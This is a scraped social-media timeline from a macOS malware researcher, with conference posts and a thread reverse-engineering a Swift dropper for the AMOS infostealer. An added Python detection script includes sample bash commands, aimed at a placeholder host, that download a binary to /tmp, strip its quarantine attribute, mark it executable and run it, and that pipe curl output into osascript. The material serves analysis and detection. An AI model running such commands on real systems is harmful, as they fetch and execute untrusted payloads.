L0Psec

@L0Psec

Followers
2K
Following
10K
Media
219
Statuses
2K

Father | macOS Security Researcher | RE | arm64 | InfoSec

NC
Joined October 2017
@L0Psec
L0Psec
26 days
New RE Video: In this video, I reverse engineer a malicious SwiftUI dropper. Swift is fun to RE so I thought it would be a good idea :). Shout out to @txhaflaire for their recent blog post that covers this malware.
1
21
89
@L0Psec
L0Psec
9 hours
Appreciate the share as always @moonlock_lab! I feel it has been a while since we've seen such a readable Infostealer dropper. Unencrypted string commands passed to system() 4x and curl download output piped to osascript.
@moonlock_lab
Moonlock Lab
1 day
1/7: Our fellow researcher @g0njxa shared juicy info with us: a real #ClickFix-style find! A fake "Installation Instructions" pop-up pushes users to run a malicious bash command via Terminal. We couldn’t resist checking it, and what we uncovered? A multi-stage #macOS #stealer 👇
0
6
20
@L0Psec
L0Psec
2 days
Appreciate y’all. Thanks for having me as a speaker and being a cool place to hang out at! Got to meet a lot of incredible people there :).
@MalwareVillage
Malware Village
2 days
That wraps up #MalwareVillage @DEFCON 33! 🥳 Special thanks to all the organizers, sponsors, volunteers, speakers, workshoppers, collaborators, attendees, and everyone involved, for making this event absolutely legendary! 🤩 Thank you all! 🙏
1
3
23
@L0Psec
L0Psec
4 days
Got to talk about Swift RE yesterday at @MalwareVillage #defcon33 which was awesome! Decided to record an RE video while at DEFCON for fun, check it out :).
0
7
37
@L0Psec
L0Psec
6 days
Time for my @MalwareVillage Swift talk tomorrow changed to 3:50pm. Come check it out if you want to see some live macOS malware reversing :) #defcon33
3
5
26
@L0Psec
L0Psec
6 days
Made it to Vegas for my first #DEFCON :) @defcon
1
2
25
@L0Psec
L0Psec
6 days
Definitely helps make the decompilation look much prettier :).
@vector35
Vector 35
6 days
One of the coolest new things in Binary Ninja 5.1? Pseudo Objective‑C. Huge shoutout to @bdash, who actually wrote this before joining the team (talk about an overkill job application). If you’re digging into iOS, Swift, or kernelcaches, this one’s a game‑changer.
0
0
14
@L0Psec
L0Psec
8 days
This will result in the update Mach-O being executed with the credentials captured. There is even an error message if it were to fail :)
0
1
1
@L0Psec
L0Psec
8 days
There is a closure that is also observed related to the use of osascript which we saw in the first screenshot. Uses the same swift function to grab the path to osascript from 0x100031520 as a Swift object. This is then used to set up another NSTask
1
1
1
@L0Psec
L0Psec
8 days
This command and a path to bash are both set up and passed as arguments to the NSTask object through the use of bridging functions to convert Swift objects into NSObjects.
1
1
1
@L0Psec
L0Psec
8 days
Taking a look at the first address: 0x100031450, we can see the command that will be executed which results in the download to /tmp, clears extended attributes, and sets execute permissions.
1
1
1
@L0Psec
L0Psec
8 days
The AppDelegate class has a method appropriately named runHiddenUpdateScript() which sets up the NSTask object. Before we get into the NSTask setup, we can see the use of swift_initStaticObject() which references addresses of strings used by NSTask.
1
1
2
@L0Psec
L0Psec
8 days
This app leverages NSTask for downloading/executing the Infostealer Mach-O. Uses curl to connect to hxxps[:]//specter-storage[.]com/git/update (which already has a couple detections) and downloads the Mach-O named "update". Let's look at how it does this.
2
1
2
@L0Psec
L0Psec
8 days
Another Swift Dropper for AMOS/AMOS-like variant found by the team: 84bc9007228073f4d73f4e6f7a05f920cd9317033d67d4c0cd375bbb95f13c70. 0 detections on VT since 5/29/25. Let's take a look at some of its behavior 🧵
1
20
60
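The thread above describes a dropper whose NSTask-launched bash command fetches a Mach-O into /tmp with curl, clears its extended attributes, marks it executable and runs it, with a second closure piping curl output into osascript. The following is an added detection example written for this page; it is not code from the thread or from the malware author. It runs a small set of behaviour predicates over constructed process-start records (the `ProcEvent` shape, the `FakeUpdater` app name and the `dropper.example.invalid` URL are all placeholders, not indicators from the thread) and reports any process tree in which enough of those stages appear together.

```python
"""Detect the dropper behaviour chain from the thread above in a list of
process-start events: curl into /tmp, xattr -c, chmod +x, execution from /tmp,
and curl piped into osascript. All input below is constructed sample data."""

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-start record, shaped like an EDR / eslogger exec event (assumed layout)."""
    pid: int
    ppid: int
    exe: str
    argv: tuple[str, ...]


# /tmp on macOS resolves to /private/tmp, so accept both spellings.
TMP = r"/(?:private/)?tmp/\S+"

# Each stage is a regex over the full command line of a single event.
STAGES = [
    ("curl_to_tmp", re.compile(rf"\bcurl\b[^|;&]*\s(?:-o|--output)\s*{TMP}")),
    ("xattr_cleared", re.compile(r"\bxattr\s+-c\s")),          # strips the quarantine attribute
    ("chmod_exec", re.compile(rf"\bchmod\s+\+x\s+{TMP}")),
    ("curl_piped_to_osascript", re.compile(r"\bcurl\b[^|]*\|\s*(?:\S*/)?osascript\b")),
]


def stages_in_cmdline(cmdline: str) -> set[str]:
    """Return the names of every stage pattern that matches this command line."""
    return {name for name, rx in STAGES if rx.search(cmdline)}


def root_pid(ev: ProcEvent, by_pid: dict[int, ProcEvent]) -> int:
    """Walk the parent chain to the top-most process we have a record for."""
    cur = ev
    while cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
    return cur.pid


def find_dropper_chains(events: list[ProcEvent], min_stages: int = 3) -> dict[int, list[str]]:
    """Group stage hits by process tree and return trees that hit at least min_stages.

    The threshold keeps a lone curl -o /tmp/... (common in build scripts) from
    alerting on its own; the chain is what makes this behaviour suspicious."""
    by_pid = {ev.pid: ev for ev in events}
    hits: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        root = root_pid(ev, by_pid)
        hits[root] |= stages_in_cmdline(" ".join(ev.argv))
        if re.match(r"^/(?:private/)?tmp/", ev.exe):
            hits[root].add("exec_from_tmp")
    return {root: sorted(s) for root, s in hits.items() if len(s) >= min_stages}


# Constructed sample feed: a placeholder app (pid 501) spawning the two bash
# commands the thread describes, the downloaded binary running, and one benign
# curl from an unrelated process.
SAMPLE_EVENTS = [
    ProcEvent(501, 1, "/Applications/FakeUpdater.app/Contents/MacOS/FakeUpdater", ("FakeUpdater",)),
    ProcEvent(502, 501, "/bin/bash", ("/bin/bash", "-c",
              "curl -s -o /tmp/update https://dropper.example.invalid/git/update "
              "&& xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update")),
    ProcEvent(503, 501, "/bin/bash", ("/bin/bash", "-c",
              "curl -s https://dropper.example.invalid/p.js | /usr/bin/osascript")),
    ProcEvent(504, 502, "/tmp/update", ("/tmp/update",)),
    ProcEvent(600, 1, "/usr/bin/curl", ("curl", "-o", "/Users/alice/Downloads/file.zip",
              "https://example.com/file.zip")),
]

if __name__ == "__main__":
    for root, stages in find_dropper_chains(SAMPLE_EVENTS).items():
        print(f"pid {root}: dropper chain stages {stages}")
```

Because the dropper hands NSTask a single `bash -c` string, the whole chain lands in the argv of one child process, which is why matching on the bash command line rather than on the NSTask API call is enough here; grouping by the root of the process tree also catches the osascript closure, which runs as a separate NSTask.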
@L0Psec
L0Psec
12 days
RT @objective_see: Slides, recordings, & photos from #OFTW v3.0 in London have posted: 😍
0
8
0
@L0Psec
L0Psec
13 days
RT @jstrosch: Reversing Mac Malware with L0Psec: Live ARM64 Analysis & Latest Trends
0
7
0
@L0Psec
L0Psec
13 days
RT @jstrosch: 🔥 Live stream starts in an hour - we're reversing Mac malware with L0psec! Join us on YouTube 👉
0
4
0
@L0Psec
L0Psec
13 days
RT @suyog41: Amos Stealer.
Setup_v.2.51.dmg 4fca1804b022996c7e2d26560c29cd11
Setup_v.5.29.dmg efafbedccf69f98685d78dc1d8bb544b
Setup_v.4.…
0
4
0
@L0Psec
L0Psec
13 days
RT @motuariki_: macOS malware: Amos Stealer variants have been busy. Here are some malicious domains being used to spread them. Hashes conn….
0
14
0
@L0Psec
L0Psec
14 days
Trip to London last week for @objective_see #OFTW. Taught an arm64 class and did a macOS malware reversing demo. Got to see/meet a lot of cool people! Thanks to @andyrozen and @patrickwardle as always. Shoutout to @vector35 for providing binja licenses to students :)
1
8
44
@L0Psec
L0Psec
15 days
RT @theevilbit: 🍎🐛 macOS 15.6 is out, a few new CVEs and mentions. NetAuth. Impact: An app may be able to break out of its sandbox. CVE-202…
0
7
0